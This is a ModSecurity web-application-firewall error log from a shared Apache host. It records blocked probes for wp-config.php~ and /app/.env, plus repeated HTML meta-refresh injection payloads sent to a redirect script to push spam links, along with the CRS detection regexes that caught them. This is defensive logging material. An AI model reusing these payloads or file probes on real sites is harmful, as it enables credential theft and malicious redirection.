[Tue May 12 02:18:21.011544 2026] [security2:error] [pid 1730175:tid 1730179] [client 130.12.182.66:41116] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php~"] [unique_id "agJxzXo6NvB9WXx5V-5z9AAAAQI"]
[Tue May 12 02:18:21.011687 2026] [security2:error] [pid 1730175:tid 1730179] [client 130.12.182.66:41116] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php~"] [unique_id "agJxzXo6NvB9WXx5V-5z9AAAAQI"]
[Tue May 12 02:18:21.011859 2026] [security2:error] [pid 1730175:tid 1730179] [client 130.12.182.66:41116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzXo6NvB9WXx5V-5z9AAAAQI"]
[Tue May 12 02:18:42.286806 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.287214 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.287389 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.287495 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.287669 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.288089 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:18:42.288389 2026] [security2:error] [pid 1709071:tid 1709091] [client 27.78.84.116:63943] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJx4rvMumyrWMfSu7qilwAAAMQ"]
[Tue May 12 02:19:03.878715 2026] [:error] [pid 1707624:tid 1707701] [client 95.238.182.6:57474] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com
[Tue May 12 02:19:04.016225 2026] [:error] [pid 1730175:tid 1730186] [client 95.238.182.6:57477] File does not exist: /home/piregwan/public_html/wp-login.php, referer: https://www.piregwan-genesis.com/wp-login.php?action=register
[Tue May 12 02:19:14.623655 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.624092 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.625451 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.636938 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.637981 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.639251 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:14.639932 2026] [security2:error] [pid 1691274:tid 1691297] [client 27.78.84.116:65061] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyAlfdQaraX_prmqcYagAAABY"]
[Tue May 12 02:19:18.505946 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.229:39422] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rixonephotography.com"] [uri "/app/.env"] [unique_id "agJyBlfdQaraX_prmqcYawAAABM"]
[Tue May 12 02:19:18.506181 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.229:39422] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rixonephotography.com"] [uri "/app/.env"] [unique_id "agJyBlfdQaraX_prmqcYawAAABM"]
[Tue May 12 02:19:19.964691 2026] [security2:error] [pid 1691274:tid 1691295] [client 176.65.139.229:39422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rixonephotography.com"] [uri "/index.php"] [unique_id "agJyBlfdQaraX_prmqcYawAAABM"]
[Tue May 12 02:19:34.644215 2026] [security2:error] [pid 1730207:tid 1730228] [client 119.28.100.147:39298] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyFjue9Sp-pIv_Bb6JuAAAAVM"], referer: http://www.piregwan-genesis.com/liens/redirect.php?url=https://sapienspublishing.com
[Tue May 12 02:19:37.346572 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://ttps%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
[Tue May 12 02:19:37.350515 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=htt..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
[Tue May 12 02:19:37.358854 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WA [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
[Tue May 12 02:19:37.366688 2026] [security2:error] [pid 1709071:tid 1709102] [client 27.78.84.116:49653] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://ttps%3A%2f%Evolv.e.l.U.pc@Haedongacademy.org/phpinfo.php?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Where to buy high-class evening dresses</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJyGbvMumyrWMfSu7qitgAAAM8"]
